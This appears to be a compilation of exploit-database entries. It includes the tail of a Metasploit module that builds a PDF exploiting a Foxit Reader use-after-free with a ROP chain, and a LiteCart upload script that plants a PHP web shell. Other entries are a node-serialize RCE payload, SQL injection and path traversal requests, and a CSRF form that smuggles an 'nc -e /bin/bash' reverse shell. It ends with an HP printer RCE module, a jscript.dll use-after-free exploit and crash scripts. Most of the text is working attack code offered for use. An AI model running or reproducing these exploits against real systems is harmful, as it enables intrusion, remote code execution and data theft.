fname = datastore['EXENAME'].empty? ? "#{Rex::Text.rand_text_alpha_lower(1)}.exe" : datastore['EXENAME']
fname << '.exe' unless fname.ends_with?('.exe')
share_path = "\\\\#{datastore['LHOST']}\\#{share}\\#{fname}"
num = 4 - (share_path.length % 4)
share_path << "\x00"*num
return nil if share_path.length > 44
print_status("share_path: #{share_path}")
rop = ''
max_index = 0
share_path.unpack('V*').each_with_index {|blk, index|
rop << "\nrop[0x%02x] = 0x%08x" % [index+12, blk]
max_index = index
}
(max_index+1).upto(10) {|i| rop << "\nrop[0x%02x] = 0x00000000" % (i+12)}
<<~PDFDOC
%PDF
1 0 obj
<</Pages 1 0 R /OpenAction 2 0 R>>
2 0 obj
<</S /JavaScript /JS (
var heap_ptr = 0;
var foxit_base = 0;
var pwn_array = [];
function prepare_heap(size){
var arr = new Array(size);
for(var i = 0; i < size; i++){
arr[i] = this.addAnnot({type: "Text"});;
if (typeof arr[i] == "object"){
arr[i].destroy();
}
}
}
function gc() {
const maxMallocBytes = 128 * 0x100000;
for (var i = 0; i < 3; i++) {
var x = new ArrayBuffer(maxMallocBytes);
}
}
function alloc_at_leak(){
for (var i = 0; i < 0x64; i++){
pwn_array[i] = new Int32Array(new ArrayBuffer(0x40));
}
}
function control_memory(){
for (var i = 0; i < 0x64; i++){
for (var j = 0; j < pwn_array[i].length; j++){
pwn_array[i][j] = foxit_base + 0x01a7ee23; // push ecx; pop esp; pop ebp; ret 4
}
}
}
function leak_vtable(){
var a = this.addAnnot({type: "Text"});
a.destroy();
gc();
prepare_heap(0x400);
var test = new ArrayBuffer(0x60);
var stolen = new Int32Array(test);
var leaked = stolen[0] & 0xffff0000;
foxit_base = leaked - 0x01f50000;
}
function leak_heap_chunk(){
var a = this.addAnnot({type: "Text"});
a.destroy();
prepare_heap(0x400);
var test = new ArrayBuffer(0x60);
var stolen = new Int32Array(test);
alloc_at_leak();
heap_ptr = stolen[1];
}
function reclaim(){
var arr = new Array(0x10);
for (var i = 0; i < arr.length; i++) {
arr[i] = new ArrayBuffer(0x60);
var rop = new Int32Array(arr[i]);
rop[0x00] = heap_ptr; // pointer to our stack pivot from the TypedArray leak
rop[0x01] = foxit_base + 0x01a11d09; // xor ebx,ebx; or [eax],eax; ret
rop[0x02] = 0x72727272; // junk
rop[0x03] = foxit_base + 0x00001450 // pop ebp; ret
rop[0x04] = 0xffffffff; // ret of WinExec
rop[0x05] = foxit_base + 0x0069a802; // pop eax; ret
rop[0x06] = foxit_base + 0x01f2257c; // IAT WinExec
rop[0x07] = foxit_base + 0x0000c6c0; // mov eax,[eax]; ret
rop[0x08] = foxit_base + 0x00049d4e; // xchg esi,eax; ret
rop[0x09] = foxit_base + 0x00025cd6; // pop edi; ret
rop[0x0a] = foxit_base + 0x0041c6ca; // ret
rop[0x0b] = foxit_base + 0x000254fc; // pushad; ret
#{rop}
rop[0x17] = 0x00000000; // adios, amigo
}
}
function trigger_uaf(){
var that = this;
var a = this.addAnnot({type:"Text", page: 0, name:"uaf"});
var arr = [1];
Object.defineProperties(arr,{
"0":{
get: function () {
that.getAnnot(0, "uaf").destroy();
reclaim();
return 1;
}
}
});
a.point = arr;
}
function main(){
leak_heap_chunk();
leak_vtable();
control_memory();
trigger_uaf();
}
if (app.platform == "WIN"){
if (app.isFoxit == "Foxit Reader"){
if (app.appFoxitVersion == "9.0.1.1049"){
main();
}
}
}
)>> trailer <</Root 1 0 R>>
PDFDOC
end
def exploit
mypdf = pdfdoc
if mypdf.nil?
fail_with(Failure::BadConfig, 'The generated share path was greater than 44 bytes.')
end
file_create(mypdf)
end
end
# Exploit Title: LiteCart 2.1.2 - Arbitrary File Upload
# Date: 2018-08-27
# Exploit Author: Haboob Team
# Software Link: https://www.litecart.net/downloading?version=2.1.2
# Version: 2.1.2
# CVE : CVE-2018-12256
# 1. Description
# admin/vqmods.app/vqmods.inc.php in LiteCart 2.1.2 allows remote authenticated attackers
# to upload a malicious file (resulting in remote code execution) by using the text/xml
# or application/xml Content-Type in a public_html/admin/?app=vqmods&doc=vqmods request.
# 2. Proof of Concept
#!/usr/bin/env python
import mechanize
import cookielib
import urllib2
import requests
import sys
import argparse
import random
import string
parser = argparse.ArgumentParser(description='LiteCart')
parser.add_argument('-t',
help='admin login page url - EX: https://IPADDRESS/admin/')
parser.add_argument('-p',
help='admin password')
parser.add_argument('-u',
help='admin username')
args = parser.parse_args()
if(not args.u or not args.t or not args.p):
sys.exit("-h for help")
url = args.t
user = args.u
password = args.p
br = mechanize.Browser()
cookiejar = cookielib.LWPCookieJar()
br.set_cookiejar( cookiejar )
br.set_handle_equiv( True )
br.set_handle_redirect( True )
br.set_handle_referer( True )
br.set_handle_robots( False )
br.addheaders = [ ( 'User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1' ) ]
response = br.open(url)
br.select_form(name="login_form")
br["username"] = user
br["password"] = password
res = br.submit()
response = br.open(url + "?app=vqmods&doc=vqmods")
one=""
for form in br.forms():
one= str(form).split("(")
one= one[1].split("=")
one= one[1].split(")")
one = one[0]
cookies = br._ua_handlers['_cookies'].cookiejar
cookie_dict = {}
for c in cookies:
cookie_dict[c.name] = c.value
rand = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(5))
files = {
'vqmod': (rand + ".php", "<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); } ?>", "application/xml"),
'token':one,
'upload':(None,"Upload")
}
response = requests.post(url + "?app=vqmods&doc=vqmods", files=files, cookies=cookie_dict)
r = requests.get(url + "../vqmod/xml/" + rand + ".php?c=id")
if r.status_code == 200:
print "Shell => " + url + "../vqmod/xml/" + rand + ".php?c=id"
print r.content
else:
print "Sorry something went wrong"
var serialize = require('node-serialize');
var payload = '{"rce":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });}()"}';
serialize.unserialize(payload);
The attached fuzz file causes an out-of-bounds read in AVC processing. To reproduce the issue, put both attached files on a server, and vist:
http://127.0.0.1/LoadMP4.swf?file=transpose.mp4
This issue reproduces on Chrome and Firefox for Linux.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45268.zip
------------------------------------------------------------------------
Seagate Media Server multiple SQL injection vulnerabilities
------------------------------------------------------------------------
Yorick Koster, September 2017
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
Seagate Personal Cloud is a consumer-grade Network-Attached Storage
device (NAS). It was found that Seagate Media Server is affected by
multiple SQL injection vulnerabilities. An unauthenticated attacker can
exploit this issue to retrieve or modify arbitrary data in the database
used by Seagate Media Server. Seagate Media Server uses a separate
SQLite3 database, which limits what the attacker can do with this issue.
------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was tested on a Seagate Personal Cloud model SRN21C running
firmware versions 4.3.16.0 and 4.3.18.0. It is likely that other
devices/models are also affected.
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
These vulnerabilities have been fixed in firmware version 4.3.19.3.
http://knowledge.seagate.com/articles/en_US/FAQ/007752en
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2017/seagate-media-server-multiple-sql-injection-vulnerabilities.html
Seagate Media Server uses the Django web framework and is mapped to the .psp extension. Any URL that ends with .psp is automatically send to the Seagate Media Server application using the FastCGI protocol.
/etc/lighttpd/conf.d/django-host.conf:
fastcgi.server += (
".psp"=>
((
"socket" => "/var/run/manage_py-fastcgi.socket",
"check-local" => "disable",
"stream-post" => "enable",
"allow-x-send-file" => "enable",
)),
".psp/"=>
((
"socket" => "/var/run/manage_py-fastcgi.socket",
"check-local" => "disable",
"stream-post" => "enable",
"allow-x-send-file" => "enable",
))
)
URLs are mapped to specific views in the file /usr/lib/django_host/seagate_media_server/urls.py. It was found that many views contains SQL injection vulnerabilities. Since the number of issues is large only a selection of the identified issues is listed below.
/usr/lib/python2.7/site-packages/sms/Doc/core/documentSort.py (insecure use of format):
searchResult = self.dbObj.execute_command(RequestType.GETDICT, searchQuery.format(orderby = orderby,order = order,startwith_construct=startwith_construct), params = paramdict, priority = PriorityLevel.UI)
[...]
searchQuery = "Select id as UID, id, name, url, thumbUrl, size, approxFileSize, creationTime, approxCreationTime, type, extension, views, " \
"SUBSTR(album, 0, length(album) - 32) AS album, album AS albumId," \
"dirId, title as dtitle, dropboxSync , googleDriveSync from doc where album like :name escape '|' order by {orderby} {order} LIMIT :offset offset :start".format(orderby = orderby,order = order)
/usr/lib/python2.7/site-packages/sms/FolderView/core/Folder.py (unsafe string concatenation):
def allfiles(self, start, count, order, uid, orderby, folderOnly):
dirOrderby = "name"
if orderby == "creationTime":
dirOrderby = "creationTime"
countdirectory = "SELECT count(id) FROM directories WHERE parentdirId= '" + uid + "'"
dcount = 0
result = self.dbObj.execute_command(RequestType.GETONE, countdirectory, priority = PriorityLevel.UI)
if result:
dcount = result["data"]["result"][0]
count = int(count)
start = int(start)
tcount = start + count
if start <= dcount:
if tcount > dcount:
ocount = tcount - dcount
searchfolder = "SELECT id, name, url, parentdirId, creationTime, thumbUrl FROM directories WHERE parentdirId= '" + uid + "' ORDER BY " + dirOrderby + " " + order + " LIMIT " + str(count) + " OFFSET " + str(start)
Similar issues were observed in the following files (non-exhaustive list):
- /usr/lib/python2.7/site-packages/sms/Music/core/musicSort.py
- /usr/lib/python2.7/site-packages/sms/Music/views.py
- /usr/lib/python2.7/site-packages/sms/Photo/core/photoSort.py
- /usr/lib/python2.7/site-packages/sms/Photo/views.py
- /usr/lib/python2.7/site-packages/sms/Video/core/videoSort.py
- /usr/lib/python2.7/site-packages/sms/Video/views.py
Proof of concept
The following proof of concept can be used to verify this issue.
http://personalcloud.local/folderViewAllFiles.psp?start=0&count=60&url=%2F&dirId=\'+union+select+null,name,null,sql,null,null+from+sqlite_master+--+'
The following vulnerabilities were fixed in the version 9.13.4.
https://responsivefilemanager.com
#1 Path Traversal Allows to Read Any File
Reserved CVE: CVE-2018-15535
Discovered By: Simon Uvarov
Vendor Status: Fixed
Details:
The following request allows a user to read any file on the system.
GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd HTTP/1.1
Host: 192.168.5.129
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.5.129/filemanager/dialog.php?type=0&popup=1
X-Requested-With: XMLHttpRequest
Cookie: last_position=%2F; PHPSESSID=na248cef3f937mtql67dvu8fk5
Connection: close
#2 Path Traversal While Upacking Archives
Reserved CVE: CVE-2018-15536
Discovered By: Simon Uvarov
Vendor Status: Fixed
The following request starts unpacking the exploit.zip archive:
POST /filemanager/ajax_calls.php?action=extract HTTP/1.1
Host: 192.168.5.129
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.5.129/filemanager/dialog.php?type=0&lang=en_EN&popup=1&crossdomain=0&relative_url=0&akey=key&fldr=&5b6d9b91535a9&1533909952983
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 16
Cookie: last_position=%2F; PHPSESSID=na248cef3f937mtql67dvu8fk5
Connection: close
path=exploit.zip
Bases64-encoded example of exploit.zip which creates source.txt in /tmp/ directory:
UEsDBBQAAAAAALZNmkR7I19kDgAAAA4AAAAmAAAALi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vdG1w
L3NvdXJjZS50eHR1cGxvYWRzIGZvbGRlclBLAQIUAxQAAAAAALZNmkR7I19kDgAAAA4AAAAmAAAA
AAAAAAAAAADtgQAAAAAuLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi90bXAvc291cmNlLnR4dFBLBQYA
AAAAAQABAFQAAABSAAAAAAA=
It is possible to create archives containing ../../ as a part of a file path, now it's famous as ZipSlip vulnerability, but it's an old bug.
It is impossible to upload .php files or .htaccess file using this method, but itas possible to create different files with "legal" extensions on a system and it may lead to remote code execution if a server runs with enough privileges, for example, to create cron jobs.
<!--
About:
===========
Component: Plainview Activity Monitor (Wordpress plugin)
Vulnerable version: 20161228 and possibly prior
Fixed version: 20180826
CVE-ID: CVE-2018-15877
CWE-ID: CWE-78
Author:
- LydA(c)ric Lefebvre (https://www.linkedin.com/in/lydericlefebvre)
Timeline:
===========
- 2018/08/25: Vulnerability found
- 2018/08/25: CVE-ID request
- 2018/08/26: Reported to developer
- 2018/08/26: Fixed version
- 2018/08/26: Advisory published on GitHub
- 2018/08/26: Advisory sent to bugtraq mailing list
Description:
===========
Plainview Activity Monitor Wordpress plugin is vulnerable to OS
command injection which allows an attacker to remotely execute
commands on underlying system. Application passes unsafe user supplied
data to ip parameter into activities_overview.php.
Privileges are required in order to exploit this vulnerability, but
this plugin version is also vulnerable to CSRF attack and Reflected
XSS. Combined, these three vulnerabilities can lead to Remote Command
Execution just with an admin click on a malicious link.
References:
===========
https://github.com/aas-n/CVE/blob/master/CVE-2018-15877/
PoC:
-->
<html>
<!-- Wordpress Plainview Activity Monitor RCE
[+] Version: 20161228 and possibly prior
[+] Description: Combine OS Commanding and CSRF to get reverse shell
[+] Author: LydA(c)ric LEFEBVRE
[+] CVE-ID: CVE-2018-15877
[+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell
[+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well
-->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
<input type="hidden" name="ip" value="google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash" />
<input type="hidden" name="lookup" value="Lookup" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require "rex/proto/pjl"
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::SNMPClient
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'HP Jetdirect Path Traversal Arbitrary Code Execution',
'Description' => %q{
The module exploits a path traversal via Jetdirect to gain arbitrary code execution by
writing a shell script that is loaded on startup to /etc/profile.d. Then, the printer
is restarted using SNMP. Impacted printers:
HP PageWide Managed MFP P57750dw
HP PageWide Managed P55250dw
HP PageWide Pro MFP 577z
HP PageWide Pro 552dw
HP PageWide Pro MFP 577dw
HP PageWide Pro MFP 477dw
HP PageWide Pro 452dw
HP PageWide Pro MFP 477dn
HP PageWide Pro 452dn
HP PageWide MFP 377dw
HP PageWide 352dw
HP OfficeJet Pro 8730 All-in-One Printer
HP OfficeJet Pro 8740 All-in-One Printer
HP OfficeJet Pro 8210 Printer
HP OfficeJet Pro 8216 Printer
HP OfficeJet Pro 8218 Printer
Please read the module documentation regarding the possibility for leaving an
unauthenticated telnetd service running as a side effect of this exploit.
},
'Author' => [
'Jacob Baines', # Python PoC
'Matthew Kienow <matthew_kienow[AT]rapid7.com>', # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2017-2741' ],
[ 'URL', 'https://support.hp.com/lt-en/document/c05462914' ],
[ 'URL', 'http://tenable.com/blog/rooting-a-printer-from-security-bulletin-to-remote-code-execution' ]
],
'Targets' => [
['Unix (In-Memory)',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' => {
'Compat' => {
'PayloadType' => 'cmd'
}
},
]
],
'Privileged' => true,
'DisclosureDate' => 'Apr 05 2017',
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/bind_busybox_telnetd',
'WfsDelay' => 180
}
))
register_options(
[
Opt::RPORT(Rex::Proto::PJL::DEFAULT_PORT),
OptPort.new('SNMPPORT', [true, 'The SNMP port', 161])
]
)
end
def execute_command(cmd, opts = {})
rpath = '0:/../../rw/var/etc/profile.d/'
stager_script_name = opts[:stager_script_name]
cmd = "(cd / && #{cmd}); rm -f /etc/profile.d/#{stager_script_name}"
begin
# use PJL to write command stager
print_status("Connecting to port #{rport}...")
pjl = Rex::Proto::PJL::Client.new(sock)
pjl.begin_job
pjl.fsinit(rpath[0..1])
print_status("Attempting to write command stager...")
rpath = "#{rpath}#{stager_script_name}"
if pjl.fsdownload(cmd, rpath, is_file: false)
print_good("Successfully wrote command stager to #{rpath}")
else
print_error("Failed to write command stager to #{rpath}")
return
end
# verify command stager exists
unless pjl.fsquery(rpath)
print_error("Command stager does not exist at #{rpath}; aborting...")
return
end
pjl.end_job
rescue Rex::ConnectionError
print_error("Connection Refused")
raise
end
end
def restart_printer
pjl_port = datastore['RPORT']
snmp_port = datastore['SNMPPORT']
community = datastore['COMMUNITY']
# Printer MIB prtGeneralReset object identifier (numeric notation)
prt_general_reset = '1.3.6.1.2.1.43.5.1.1.3.1'
# prtGeneralReset powerCycleReset(4) value
power_cycle_reset = 4
begin
# TODO: Update when there is a clean approach to using two or more mixins that both use RPORT.
datastore['RPORT'] = snmp_port
print_status("Connecting to SNMP port #{rport}...")
snmp = connect_snmp
# get value of Printer MIB prtGeneralReset
reset_value = snmp.get_value(prt_general_reset)
reset_value = "''" if reset_value.is_a?(SNMP::Null)
print_status("Initial value of prtGeneralReset OID #{prt_general_reset} => #{reset_value}")
# set value of Printer MIB prtGeneralReset to powerCycleReset(4)
print_status("Attempting to restart printer via SNMP...")
varbind = SNMP::VarBind.new(prt_general_reset, SNMP::Integer.new(power_cycle_reset))
response = snmp.set(varbind)
if response.error_status == :noError
print_status("Set prtGeneralReset OID #{prt_general_reset} => #{power_cycle_reset}")
# get value of Printer MIB prtGeneralReset
reset_value = snmp.get_value(prt_general_reset)
reset_value = "''" if reset_value.is_a?(SNMP::Null)
print_status("Current value of prtGeneralReset OID #{prt_general_reset} => #{reset_value}")
print_status("Printer restarting...")
else
print_error("Unable to set prtGeneralReset; SNMP response error status: #{response.error_status}")
end
rescue SNMP::RequestTimeout
print_error("SNMP request timeout with community '#{community}'")
raise
rescue SNMP::UnsupportedVersion
print_error("Unsupported SNMP version specified; use '1' or '2c'")
raise
rescue Rex::ConnectionError
print_error("Connection Refused")
raise
ensure
# restore original rport value
datastore['RPORT'] = pjl_port
end
end
def exploit
begin
opts = {
stager_script_name: "#{Rex::Text.rand_text_alpha(8)}.sh"
}
print_status("Exploiting...")
connect
if target.name =~ /Unix/
execute_command(payload.encoded, opts)
else
execute_cmdstager(opts)
end
restart_printer
return
ensure
disconnect
end
end
end
CVE-2018-15685 - Electron WebPreferences Remote Code Execution
This is a minimal Electron application with a POC for CVE-2018-15685.
A remote code execution vulnerability has been discovered affecting apps with the ability to open nested child windows on Electron versions (3.0.0-beta.6, 2.0.7, 1.8.7, and 1.7.15). This vulnerability has been assigned the CVE identifier CVE-2018-15685.
For more information see my full write up on the Contrast Security blog (https://www.contrastsecurity.com/security-influencers/cve-2018-15685) or the write up on the offical blog from Electron (https://electronjs.org/blog/web-preferences-fix)
The project contains the fillowing files:
main.js - This is the app's main process. Note this has nodeIntegration disabled so it should not be possibe use "process"
index.html - This is an example rendered page. This could be remotely controlled URL, or a page from an application with an XSS. In this example even though it is a local file but should not have access to node bindings.
You can learn more about each of these components within the Quick Start Guide.
To Use
To clone and run this repository you'll need Git and Node.js (which comes with npm) installed on your computer. From your command line:
# Clone this repository
git clone https://github.com/matt-/CVE-2018-15685
# Go into the repository
cd CVE-2018-15685
# Install dependencies
npm install
# Run the app
npm start
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45272.zip
# Exploit Title: Instagram App 41.1788.50991.0 - Denial of Service (PoC)
# Exploit Author : Ali Alipour
# Date: 2018-08-25
# Vendor Homepage : https://www.instagram.com/
# Software Link Download : https://www.microsoft.com/en-us/p/instagram/9nblggh5l9xt?ocid=blitz_windowsblog&activetab=pivot%3aoverviewtab
# About : https://blogs.windows.com/windowsexperience/2016/10/13/instagram-app-for-windows-10-expands-to-pc-and-tablets/#SKp37OKfVaj7FRee.97
# Tested on : Windows 10 - 64-bit
# Steps to Reproduce
# Run the python exploit script, it will create a new
# file with the name "Instagram.txt" just copy the text inside "Instagram.txt"
# and start the Instagram App - In Microsoft Windows 10 .
# In The New Window Click " Sign Up With Phone Or Email " And Select Email Tab.
# Now Paste The Content Of "Instagram.txt" Into The Field: " Email Address ".
# Click "Next" And You Will See a [ Boom !!!! ] - Instagram App - In Microsoft Windows 10 Crash.
#!/usr/bin/python
buffer = "A" * 60000
payload = buffer
try:
f=open("Instagram.txt",22"w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
<!--
There is a use-after-free vulnerability in jscript.dll related to how the lastIndex property of a RegExp object is handled. This vulnerability can be exploited through Internet Explorer or potentially through WPAD over local network. The vulnerability has been reproduced on multiple Windows versions with the most recent patches applied.
The issue is that lastIndex property of a RegExp object is not tracked by the garbage collector. If you look at RegExpObj::LastIndex you'll see that, on x64, lastIndex gets stored in a VAR at offset 272 (at least in my version), but if you take a look at RegExpObj::ScavengeCore (which gets called by the garbage collector to track various member variables) you'll notice that that offset is not being tracked. This allows an attacker to set the lastIndex property, and after the garbage collector gets trigger, the corresponding variable is going to get freed. As JavaScript variables are all allocated in blocks by a custom allocator, to turn this into a crash the entire block of variables needs to get freed. This is similar to some already reported issues, e.g. https://bugs.chromium.org/p/project-zero/issues/detail?id=1506
PoC for IE:
=========================================================
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
<script language="Jscript.Encode">
alert('start');
var vars = [];
var r = new RegExp();
for(var i=0; i<20000; i++) {
vars[i] = "aaaaa";
}
r.lastIndex = "aaaaa";
for(var i=20000; i<40000; i++) {
vars[i] = "aaaaa";
}
vars.length = 0;
CollectGarbage();
alert(r.lastIndex);
alert('failed');
</script>
=========================================================
Crash log:
=========================================================
(760.650): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
jscript!PrepareInvoke+0x2b1:
000007fe`f26674f1 66390f cmp word ptr [rdi],cx ds:00000000`04878e98=????
0:014> r
rax=0000000000000000 rbx=000000000000400c rcx=000000000000008f
rdx=0000000000000000 rsi=0000000000000000 rdi=0000000004878e98
rip=000007fef26674f1 rsp=000000001268b080 rbp=0000000000000080
r8=0000000004095f50 r9=0000000000000008 r10=000000000000000b
r11=0000000000000005 r12=0000000000000000 r13=000000001268b158
r14=0000000004095f68 r15=0000000000000001
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
jscript!PrepareInvoke+0x2b1:
000007fe`f26674f1 66390f cmp word ptr [rdi],cx ds:00000000`04878e98=????
0:014> k
# Child-SP RetAddr Call Site
00 00000000`1268b080 000007fe`f26505d4 jscript!PrepareInvoke+0x2b1
01 00000000`1268b0f0 000007fe`f2674343 jscript!InvokeDispatchEx+0xb4
02 00000000`1268b280 000007fe`f263600b jscript!VAR::InvokeByDispID+0x3e303
03 00000000`1268b2d0 000007fe`f2636ee2 jscript!CScriptRuntime::Run+0x3a0c
04 00000000`1268b680 000007fe`f2636d4b jscript!ScrFncObj::CallWithFrameOnStack+0x162
05 00000000`1268b890 000007fe`f2636bb5 jscript!ScrFncObj::Call+0xb7
06 00000000`1268b930 000007fe`f263b690 jscript!CSession::Execute+0x19e
07 00000000`1268ba00 000007fe`f2644027 jscript!COleScript::ExecutePendingScripts+0x17a
08 00000000`1268bad0 000007fe`f2643826 jscript!COleScript::ParseScriptTextCore+0x267
09 00000000`1268bbc0 000007fe`e8effdd1 jscript!COleScript::ParseScriptText+0x56
0a 00000000`1268bc20 000007fe`e9661d3c MSHTML!CActiveScriptHolder::ParseScriptText+0xc1
0b 00000000`1268bca0 000007fe`e8f00d96 MSHTML!CScriptCollection::ParseScriptText+0x37f
0c 00000000`1268bd80 000007fe`e8f007d1 MSHTML!CScriptData::CommitCode+0x3d9
0d 00000000`1268bf50 000007fe`e8f00561 MSHTML!CScriptData::Execute+0x283
0e 00000000`1268c010 000007fe`e9663655 MSHTML!CHtmScriptParseCtx::Execute+0x101
0f 00000000`1268c050 000007fe`e8ee86c7 MSHTML!CHtmParseBase::Execute+0x235
10 00000000`1268c0f0 000007fe`e8e5ba49 MSHTML!CHtmPost::Broadcast+0x90
11 00000000`1268c130 000007fe`e8ec282f MSHTML!CHtmPost::Exec+0x4bb
12 00000000`1268c340 000007fe`e8ec2780 MSHTML!CHtmPost::Run+0x3f
13 00000000`1268c370 000007fe`e8ec4532 MSHTML!PostManExecute+0x70
14 00000000`1268c3f0 000007fe`e8ec7f43 MSHTML!PostManResume+0xa1
15 00000000`1268c430 000007fe`e8ea5fb8 MSHTML!CHtmPost::OnDwnChanCallback+0x43
16 00000000`1268c480 000007fe`e96d488f MSHTML!CDwnChan::OnMethodCall+0x41
17 00000000`1268c4b0 000007fe`e8dc9dc5 MSHTML!GlobalWndOnMethodCall+0x254
18 00000000`1268c550 00000000`76e79bbd MSHTML!GlobalWndProc+0x150
19 00000000`1268c5d0 00000000`76e798c2 USER32!UserCallWinProcCheckWow+0x1ad
1a 00000000`1268c690 000007fe`effe42fe USER32!DispatchMessageWorker+0x3b5
1b 00000000`1268c710 000007fe`f004ad2b IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
1c 00000000`1268f990 000007fe`fec5a2cf IEFRAME!LCIETab_ThreadProc+0x3a3
1d 00000000`1268fac0 000007fe`f77e925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f
1e 00000000`1268faf0 00000000`76d559cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
1f 00000000`1268fb40 00000000`76fb383d kernel32!BaseThreadInitThunk+0xd
20 00000000`1268fb70 00000000`00000000 ntdll!RtlUserThreadStart+0x1d
=========================================================
Attached is a started-but-never-finished exploit that only leaks the heap address of the use-after-free allocation. It was tested against IE in 64-bit single process mode (via TabProcGrowth registry flag). In a 32-bit process (default) the structure sizes/offsets would likely be different so it would not work as is.
-->
<!-- saved from url=(0014)about:internet -->
<meta http-equiv="X-UA-Compatible" content="IE=7"></meta>
<script language="Jscript.Encode">
var objects = [];
var regexps = [];
var magicIndex = 0;
var magicObject;
var allocationAddress;
function infoLeak() {
// alert("in infoleak");
// leak the "next" pointer from one of the NameList entries
allocationAddress = regexps[magicIndex + 6].lastIndex / 4.9406564584124654E-324 - 0x560;
prompt("allocationAddress", allocationAddress.toString(16));
}
// specially crafted property name that allows us to test for successful exploitation
// and figure out which object got reallocated over freed block
function getName4(index) {
return String.fromCharCode(0,0,0,0,0,0,0,0, 3,0,0,0, index,0,0,0, 0,0,0,0, 3,0,0,0, 0x1337,0,0,0, 0,0,0,0);
}
function exploit() {
// todo: trigger LFH for 0x970 allocation size, might make the exploit more reliable
alert('start');
// crafted property names
var name1 = Array(570).join('a'); // makes NameList allocation of exactly 0x970 bytes
var name2 = 'bbbbbbbbbbb'; // length chosen to allign the next item correctly
var name3 = String.fromCharCode(5); // 5 is the double var type, used to leak the "next" pointer
// allocate empty objects
for(var i=0; i<500; i++) {
var o = {};
objects[i] = o;
}
// allocate regexp objects
for(var i=0;i<10000;i++) {
regexps[i] = new RegExp();
}
// allocate variables that aren't being tracked by GC
for(var i=0;i<10000;i++) {
regexps[i].lastIndex = "aaaaa";
}
// trigger freeing of var blocks
CollectGarbage();
// allocate NameList blocks over freed allocations
for(var i=0; i<500; i++) {
objects[i][name1] = 1;
}
// fill NameList blocks with other data useful for infolek stage
for(var i=0; i<500; i++) {
objects[i][name2] = 1;
objects[i][name3] = 1;
objects[i][getName4(i)] = 1;
}
for(var i=0;i<10000;i++) {
try {
if(regexps[i].lastIndex == 0x1337) {
alert("win");
magicIndex = i;
magicObject = objects[regexps[i+1].lastIndex];
infoLeak();
return;
}
} catch(e) { }
}
alert('failed');
}
exploit();
</script>
# Exploit Title: Cisco Network Assistant 6.3.3 - 'Cisco Login' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2018-08-27
# Vendor Homepage: https://www.cisco.com/
# Software Link : https://software.cisco.com/download/home/286277276/type/280775097/release/6.3.3
# Tested Version: 6.3.3
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to Produce the Crash:
# 1.- Run python code : python Cisco_Network_Assistant_6.3.3.py
# 2.- Open Cisco_Network_Assistant_6.3.3.txt and copy content to clipboard
# 3.- Open Cisco Network Assistant
# 4.- Authenticate to Cisco CCO
# 5.- Paste ClipBoard on "Cisco Login"
# 6.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 6900000
f = open ("Cisco_Network_Assistant_6.3.3.txt", "w")
f.write(buffer)
f.close()